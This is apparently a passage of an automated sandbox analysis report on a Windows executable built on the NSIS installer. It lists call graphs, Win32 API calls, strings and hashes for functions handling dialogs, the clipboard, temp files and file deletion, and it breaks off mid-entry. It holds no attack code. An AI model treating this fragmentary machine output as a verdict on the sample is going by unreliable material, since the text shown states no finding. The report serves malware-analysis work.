4044->4022 4048 40141d 80 API calls 4044->4048 4047 40141d 80 API calls 4045->4047 4046->4022 4047->4022 4048->4022 4050 40389d 4049->4050 4051 40388f CloseHandle 4049->4051 4121 403caf 4050->4121 4051->4050 4056->3891 4174 406035 lstrcpynW 4057->4174 4059 4067bb 4060 405d85 4 API calls 4059->4060 4061 4067c1 4060->4061 4062 406064 5 API calls 4061->4062 4069 403ac3 4061->4069 4065 4067d1 4062->4065 4063 406809 lstrlenW 4064 406810 4063->4064 4063->4065 4067 40674e 3 API calls 4064->4067 4065->4063 4066 406301 2 API calls 4065->4066 4065->4069 4070 40677d 2 API calls 4065->4070 4066->4065 4068 406816 GetFileAttributesW 4067->4068 4068->4069 4069->3902 4071 406035 lstrcpynW 4069->4071 4070->4063 4071->3935 4072->3940 4073->3924 4074->3932 4075->3951 4077 405ca6 4076->4077 4078 405c9a CloseHandle 4076->4078 4077->3951 4078->4077 4079->3966 4080->3968 4082 40678c 4081->4082 4083 406792 CharPrevW 4082->4083 4084 40361f 4082->4084 4083->4082 4083->4084 4085 406035 lstrcpynW 4084->4085 4085->3972 4087 4032f3 4086->4087 4088 4032db 4086->4088 4091 403303 GetTickCount 4087->4091 4092 4032fb 4087->4092 4089 4032e4 DestroyWindow 4088->4089 4090 4032eb 4088->4090 4089->4090 4090->3975 4094 403311 CreateDialogParamW ShowWindow 4091->4094 4095 403334 4091->4095 4099 40635e 4092->4099 4094->4095 4095->3975 4097->3981 4098->3982 4100 40637b PeekMessageW 4099->4100 4101 406371 DispatchMessageW 4100->4101 4102 403301 4100->4102 4101->4100 4102->3975 4104 403ed5 4103->4104 4119 405f7d wsprintfW 4104->4119 4106 403f49 4107 406831 18 API calls 4106->4107 4108 403f55 SetWindowTextW 4107->4108 4109 403f70 4108->4109 4110 403f8b 4109->4110 4111 406831 18 API calls 4109->4111 4110->4005 4111->4109 4112->4001 4113->4007 4120 406035 lstrcpynW 4114->4120 4116 403eb4 4117 40674e 3 API calls 4116->4117 4118 403eba lstrcatW 4117->4118 4118->4027 4119->4106 4120->4116 4122 403cbd 4121->4122 4123 4038a2 4122->4123 4124 403cc2 FreeLibrary GlobalFree 4122->4124 4125 406cc7 4123->4125 4124->4123 4124->4124 4126 4067aa 18 API calls 4125->4126 4127 406cda 4126->4127 4128 406ce3 DeleteFileW 4127->4128 4129 406cfa 4127->4129 4168 4038ae CoUninitialize 4128->4168 4130 406e77 4129->4130 4172 406035 lstrcpynW 4129->4172 4136 406301 2 API calls 4130->4136 4156 406e84 4130->4156 4130->4168 4132 406d25 4133 406d39 4132->4133 4134 406d2f lstrcatW 4132->4134 4137 40677d 2 API calls 4133->4137 4135 406d3f 4134->4135 4139 406d4f lstrcatW 4135->4139 4141 406d57 lstrlenW FindFirstFileW 4135->4141 4138 406e90 4136->4138 4137->4135 4142 40674e 3 API calls 4138->4142 4138->4168 4139->4141 4140 4062cf 11 API calls 4140->4168 4145 406e67 4141->4145 4169 406d7e 4141->4169 4143 406e9a 4142->4143 4146 4062cf 11 API calls 4143->4146 4144 405d32 CharNextW 4144->4169 4145->4130 4147 406ea5 4146->4147 4148 405e5c 2 API calls 4147->4148 4149 406ead RemoveDirectoryW 4148->4149 4153 406ef0 4149->4153 4154 406eb9 4149->4154 4150 406e44 FindNextFileW 4152 406e5c FindClose 4150->4152 4150->4169 4152->4145 4155 404f9e 25 API calls 4153->4155 4154->4156 4157 406ebf 4154->4157 4155->4168 4156->4140 4159 4062cf 11 API calls 4157->4159 4158 4062cf 11 API calls 4158->4169 4160 406ec9 4159->4160 4163 404f9e 25 API calls 4160->4163 4161 406cc7 72 API calls 4161->4169 4162 405e5c 2 API calls 4164 406dfa DeleteFileW 4162->4164 4165 406ed3 4163->4165 4164->4169 4166 406c94 42 API calls 4165->4166 4166->4168 4167 404f9e 25 API calls 4167->4150 4168->3910 4168->3911 4169->4144 4169->4150 4169->4158 4169->4161 4169->4162 4169->4167 4170 404f9e 25 API calls 4169->4170 4171 406c94 42 API calls 4169->4171 4173 406035 lstrcpynW 4169->4173 4170->4169 4171->4169 4172->4132 4173->4169 4174->4059 4930 401cb2 4931 40145c 18 API calls 4930->4931 4932 401c54 4931->4932 4933 4062cf 11 API calls 4932->4933 4934 401c64 4932->4934 4935 401c59 4933->4935 4936 406cc7 81 API calls 4935->4936 4936->4934 3706 4021b5 3707 40145c 18 API calls 3706->3707 3708 4021bb 3707->3708 3709 40145c 18 API calls 3708->3709 3710 4021c4 3709->3710 3711 40145c 18 API calls 3710->3711 3712 4021cd 3711->3712 3713 40145c 18 API calls 3712->3713 3714 4021d6 3713->3714 3715 404f9e 25 API calls 3714->3715 3716 4021e2 ShellExecuteW 3715->3716 3717 40221b 3716->3717 3718 40220d 3716->3718 3719 4062cf 11 API calls 3717->3719 3720 4062cf 11 API calls 3718->3720 3721 402230 3719->3721 3720->3717 4937 402238 4938 40145c 18 API calls 4937->4938 4939 40223e 4938->4939 4940 4062cf 11 API calls 4939->4940 4941 40224b 4940->4941 4942 404f9e 25 API calls 4941->4942 4943 402255 4942->4943 4944 405c6b 2 API calls 4943->4944 4945 40225b 4944->4945 4946 4062cf 11 API calls 4945->4946 4954 4022ac CloseHandle 4945->4954 4951 40226d 4946->4951 4948 4030e3 4949 402283 WaitForSingleObject 4950 402291 GetExitCodeProcess 4949->4950 4949->4951 4953 4022a3 4950->4953 4950->4954 4951->4949 4952 40635e 2 API calls 4951->4952 4951->4954 4952->4949 4956 405f7d wsprintfW 4953->4956 4954->4948 4956->4954 4957 404039 4958 404096 4957->4958 4959 404046 lstrcpynA lstrlenA 4957->4959 4959->4958 4960 404077 4959->4960 4960->4958 4961 404083 GlobalFree 4960->4961 4961->4958 4962 401eb9 4963 401f24 4962->4963 4966 401ec6 4962->4966 4964 401f53 GlobalAlloc 4963->4964 4968 401f28 4963->4968 4970 406831 18 API calls 4964->4970 4965 401ed5 4969 4062cf 11 API calls 4965->4969 4966->4965 4972 401ef7 4966->4972 4967 401f36 4986 406035 lstrcpynW 4967->4986 4968->4967 4971 4062cf 11 API calls 4968->4971 4981 401ee2 4969->4981 4974 401f46 4970->4974 4971->4967 4984 406035 lstrcpynW 4972->4984 4976 402708 4974->4976 4977 402387 GlobalFree 4974->4977 4977->4976 4978 401f06 4985 406035 lstrcpynW 4978->4985 4979 406831 18 API calls 4979->4981 4981->4976 4981->4979 4982 401f15 4987 406035 lstrcpynW 4982->4987 4984->4978 4985->4982 4986->4974 4987->4976

                                                                                                                                                                                                                                                                                      Executed Functions

                                                                                                                                                                                                                                                                                      Function 004050F9 Relevance: 66.8, APIs: 36, Strings: 2, Instructions: 295windowclipboardmemoryCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      control_flow_graph 0 4050f9-405114 1 4052c1-4052c8 0->1 2 40511a-405201 GetDlgItem * 3 call 403dc4 call 4044a2 call 406831 call 4062cf GetClientRect GetSystemMetrics SendMessageW * 2 0->2 3 4052f2-4052ff 1->3 4 4052ca-4052ec GetDlgItem CreateThread CloseHandle 1->4 35 405203-40521d SendMessageW * 2 2->35 36 40521f-405222 2->36 6 405320-405327 3->6 7 405301-40530a 3->7 4->3 11 405329-40532f 6->11 12 40537e-405382 6->12 9 405342-40534b call 403df6 7->9 10 40530c-40531b ShowWindow * 2 call 403dc4 7->10 22 405350-405354 9->22 10->6 16 405331-40533d call 403d44 11->16 17 405357-405367 ShowWindow 11->17 12->9 14 405384-405387 12->14 14->9 20 405389-40539c SendMessageW 14->20 16->9 23 405377-405379 call 403d44 17->23 24 405369-405372 call 404f9e 17->24 29 4053a2-4053c3 CreatePopupMenu call 406831 AppendMenuW 20->29 30 4052ba-4052bc 20->30 23->12 24->23 37 4053c5-4053d6 GetWindowRect 29->37 38 4053d8-4053de 29->38 30->22 35->36 39 405232-405249 call 403d6b 36->39 40 405224-405230 SendMessageW 36->40 41 4053df-4053f7 TrackPopupMenu 37->41 38->41 46 40524b-40525f ShowWindow 39->46 47 40527f-4052a0 GetDlgItem SendMessageW 39->47 40->39 41->30 43 4053fd-405414 41->43 45 405419-405434 SendMessageW 43->45 45->45 48 405436-405459 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 45->48 49 405261-40526c ShowWindow 46->49 50 40526e 46->50 47->30 51 4052a2-4052b8 SendMessageW * 2 47->51 52 40545b-405484 SendMessageW 48->52 54 405274-40527a call 403dc4 49->54 50->54 51->30 52->52 53 405486-4054a0 GlobalUnlock SetClipboardData CloseClipboard 52->53 53->30 54->47
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,00000403), ref: 0040515B
                                                                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EE), ref: 0040516A
                                                                                                                                                                                                                                                                                      • GetClientRect.USER32(?,?), ref: 004051C2
                                                                                                                                                                                                                                                                                      • GetSystemMetrics.USER32(00000015), ref: 004051CA
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051EB
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051FC
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040520F
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040521D
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405230
                                                                                                                                                                                                                                                                                      • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405252
                                                                                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000008), ref: 00405266
                                                                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 00405287
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405297
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004052AC
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004052B8
                                                                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003F8), ref: 00405179
                                                                                                                                                                                                                                                                                        • Part of subcall function 00403DC4: SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                                                                                                                                                                                                                                                        • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,004279E0,759223A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                                        • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                        • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                      • GetDlgItem.USER32(?,000003EC), ref: 004052D7
                                                                                                                                                                                                                                                                                      • CreateThread.KERNELBASE(00000000,00000000,Function_00005073,00000000), ref: 004052E5
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNELBASE(00000000), ref: 004052EC
                                                                                                                                                                                                                                                                                      • ShowWindow.USER32(00000000), ref: 00405313
                                                                                                                                                                                                                                                                                      • ShowWindow.USER32(?,00000008), ref: 00405318
                                                                                                                                                                                                                                                                                      • ShowWindow.USER32(00000008), ref: 0040535F
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405391
                                                                                                                                                                                                                                                                                      • CreatePopupMenu.USER32 ref: 004053A2
                                                                                                                                                                                                                                                                                      • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004053B7
                                                                                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 004053CA
                                                                                                                                                                                                                                                                                      • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053EC
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405427
                                                                                                                                                                                                                                                                                      • OpenClipboard.USER32(00000000), ref: 00405437
                                                                                                                                                                                                                                                                                      • EmptyClipboard.USER32 ref: 0040543D
                                                                                                                                                                                                                                                                                      • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 00405449
                                                                                                                                                                                                                                                                                      • GlobalLock.KERNEL32(00000000), ref: 00405453
                                                                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405467
                                                                                                                                                                                                                                                                                      • GlobalUnlock.KERNEL32(00000000), ref: 00405489
                                                                                                                                                                                                                                                                                      • SetClipboardData.USER32(0000000D,00000000), ref: 00405494
                                                                                                                                                                                                                                                                                      • CloseClipboard.USER32 ref: 0040549A
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026594899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026630695.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026783301.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_JA7cOAGHym.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                                                                                                                                                                                                                                                                      • String ID: New install of "%s" to "%s"${
                                                                                                                                                                                                                                                                                      • API String ID: 2110491804-1641061399
                                                                                                                                                                                                                                                                                      • Opcode ID: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
                                                                                                                                                                                                                                                                                      • Instruction ID: db3ff0878cedf1d1b3e6f9985675ba3e3c8e3ad145c0decdf5c07b0ce3ef5d1a
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 46B15970900609BFEB11AFA1DD89EAE7B79FB04354F00803AFA05BA1A1C7755E81DF58
                                                                                                                                                                                                                                                                                      Function 004038AF Relevance: 52.8, APIs: 22, Strings: 8, Instructions: 304filestringcomCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      control_flow_graph 202 4038af-403945 #17 SetErrorMode OleInitialize call 406328 SHGetFileInfoW call 406035 GetCommandLineW call 406035 GetModuleHandleW 209 403947-40394a 202->209 210 40394f-403963 call 405d32 CharNextW 202->210 209->210 213 4039f6-4039fc 210->213 214 403a02 213->214 215 403968-40396e 213->215 216 403a21-403a39 GetTempPathW call 4037f8 214->216 217 403970-403976 215->217 218 403978-40397c 215->218 228 403a3b-403a59 GetWindowsDirectoryW lstrcatW call 4037f8 216->228 229 403a5f-403a79 DeleteFileW call 4035b3 216->229 217->217 217->218 219 403984-403988 218->219 220 40397e-403983 218->220 222 4039e4-4039f1 call 405d32 219->222 223 40398a-403991 219->223 220->219 222->213 237 4039f3 222->237 226 403993-40399a 223->226 227 4039a6-4039b8 call 40382c 223->227 232 4039a1 226->232 233 40399c-40399f 226->233 242 4039ba-4039c1 227->242 243 4039cd-4039e2 call 40382c 227->243 228->229 240 403af8-403b07 call 403885 CoUninitialize 228->240 229->240 241 403a7b-403a81 229->241 232->227 233->227 233->232 237->213 257 403bfa-403c00 240->257 258 403b0d-403b1d call 405ccc ExitProcess 240->258 244 403ae1-403ae8 call 405958 241->244 245 403a83-403a8c call 405d32 241->245 247 4039c3-4039c6 242->247 248 4039c8 242->248 243->222 254 403a04-403a1c call 40824c call 406035 243->254 256 403aed-403af3 call 406113 244->256 260 403aa5-403aa7 245->260 247->243 247->248 248->243 254->216 256->240 262 403c02-403c1f call 406328 * 3 257->262 263 403c7d-403c85 257->263 267 403aa9-403ab3 260->267 268 403a8e-403aa0 call 40382c 260->268 293 403c21-403c23 262->293 294 403c69-403c74 ExitWindowsEx 262->294 269 403c87 263->269 270 403c8b 263->270 275 403b23-403b3d lstrcatW lstrcmpiW 267->275 276 403ab5-403ac5 call 4067aa 267->276 268->267 283 403aa2 268->283 269->270 275->240 277 403b3f-403b55 CreateDirectoryW SetCurrentDirectoryW 275->277 276->240 286 403ac7-403add call 406035 * 2 276->286 281 403b62-403b82 call 406035 * 2 277->281 282 403b57-403b5d call 406035 277->282 303 403b87-403ba3 call 406831 DeleteFileW 281->303 282->281 283->260 286->244 293->294 297 403c25-403c27 293->297 294->263 300 403c76-403c78 call 40141d 294->300 297->294 301 403c29-403c3b GetCurrentProcess 297->301 300->263 301->294 308 403c3d-403c5f 301->308 309 403be4-403bec 303->309 310 403ba5-403bb5 CopyFileW 303->310 308->294 309->303 311 403bee-403bf5 call 406c94 309->311 310->309 312 403bb7-403bd7 call 406c94 call 406831 call 405c6b 310->312 311->240 312->309 322 403bd9-403be0 CloseHandle 312->322 322->309
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • #17.COMCTL32 ref: 004038CE
                                                                                                                                                                                                                                                                                      • SetErrorMode.KERNELBASE(00008001), ref: 004038D9
                                                                                                                                                                                                                                                                                      • OleInitialize.OLE32(00000000), ref: 004038E0
                                                                                                                                                                                                                                                                                        • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                                                                                                                                        • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                                                                                                                                        • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                                                                                                                                      • SHGetFileInfoW.SHELL32(0040A264,00000000,?,000002B4,00000000), ref: 00403908
                                                                                                                                                                                                                                                                                        • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                                      • GetCommandLineW.KERNEL32(00476AA0,NSIS Error), ref: 0040391D
                                                                                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,004CF0A0,00000000), ref: 00403930
                                                                                                                                                                                                                                                                                      • CharNextW.USER32(00000000,004CF0A0,00000020), ref: 00403957
                                                                                                                                                                                                                                                                                      • GetTempPathW.KERNEL32(00002004,004E30C8,00000000,00000020), ref: 00403A2C
                                                                                                                                                                                                                                                                                      • GetWindowsDirectoryW.KERNEL32(004E30C8,00001FFF), ref: 00403A41
                                                                                                                                                                                                                                                                                      • lstrcatW.KERNEL32(004E30C8,\Temp), ref: 00403A4D
                                                                                                                                                                                                                                                                                      • DeleteFileW.KERNELBASE(004DF0C0), ref: 00403A64
                                                                                                                                                                                                                                                                                      • CoUninitialize.COMBASE(?), ref: 00403AFD
                                                                                                                                                                                                                                                                                      • ExitProcess.KERNEL32 ref: 00403B1D
                                                                                                                                                                                                                                                                                      • lstrcatW.KERNEL32(004E30C8,~nsu.tmp), ref: 00403B29
                                                                                                                                                                                                                                                                                      • lstrcmpiW.KERNEL32(004E30C8,004DB0B8,004E30C8,~nsu.tmp), ref: 00403B35
                                                                                                                                                                                                                                                                                      • CreateDirectoryW.KERNEL32(004E30C8,00000000), ref: 00403B41
                                                                                                                                                                                                                                                                                      • SetCurrentDirectoryW.KERNEL32(004E30C8), ref: 00403B48
                                                                                                                                                                                                                                                                                      • DeleteFileW.KERNEL32(0043DD40,0043DD40,?,00483008,0040A204,0047F000,?), ref: 00403B99
                                                                                                                                                                                                                                                                                      • CopyFileW.KERNEL32(004EB0D8,0043DD40,00000001), ref: 00403BAD
                                                                                                                                                                                                                                                                                      • CloseHandle.KERNEL32(00000000,0043DD40,0043DD40,?,0043DD40,00000000), ref: 00403BDA
                                                                                                                                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C30
                                                                                                                                                                                                                                                                                      • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C6C
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026594899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026630695.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026783301.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_JA7cOAGHym.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                                                                                                                                                                                                                                      • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
                                                                                                                                                                                                                                                                                      • API String ID: 2435955865-3712954417
                                                                                                                                                                                                                                                                                      • Opcode ID: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
                                                                                                                                                                                                                                                                                      • Instruction ID: 6e3717b9be2730fff72f59090edb21b77de3e5055cb75e9aafb2752c1f1d7b94
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1DA1E6715443117AD720BF629C4AE1B7EACAB0470AF10443FF545B62D2D7BD8A448BAE
                                                                                                                                                                                                                                                                                      Function 00406301 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14fileCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      control_flow_graph 790 406301-406315 FindFirstFileW 791 406322 790->791 792 406317-406320 FindClose 790->792 793 406324-406325 791->793 792->793
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                                                                                                                                                                                                                      • FindClose.KERNEL32(00000000), ref: 00406318
                                                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026594899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026630695.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026783301.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_JA7cOAGHym.jbxd
                                                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                                                      • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                                                                      • String ID: jF
                                                                                                                                                                                                                                                                                      • API String ID: 2295610775-3349280890
                                                                                                                                                                                                                                                                                      • Opcode ID: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                                                                                                                                                                                                                                                      • Instruction ID: ae54cbf5f70e9060ab25dbcc7d0ddb8e13a77f3b50f8061b144b06f1ffcf0783
                                                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C8D01231A141215BD7105778AD0C89B7E9CDF0A330366CA32F866F11F5D3348C2186ED
                                                                                                                                                                                                                                                                                      Function 00406328 Relevance: 4.5, APIs: 3, Instructions: 18libraryloaderCOMMON
                                                                                                                                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                                                                                                                                      • Executed
                                                                                                                                                                                                                                                                                      • Not Executed
                                                                                                                                                                                                                                                                                      control_flow_graph 794 406328-40633e GetModuleHandleA 795 406340-406349 LoadLibraryA 794->795 796 40634b-406353 GetProcAddress 794->796 795->796 797 406359-40635b 795->797 796->797
                                                                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                                                                      • GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                                                                                                                                      • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2026613977.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026594899.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026630695.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026649539.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2026783301.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_JA7cOAGHym.jbxd
                                                                                                                                                                                                                                                                                      Similarity
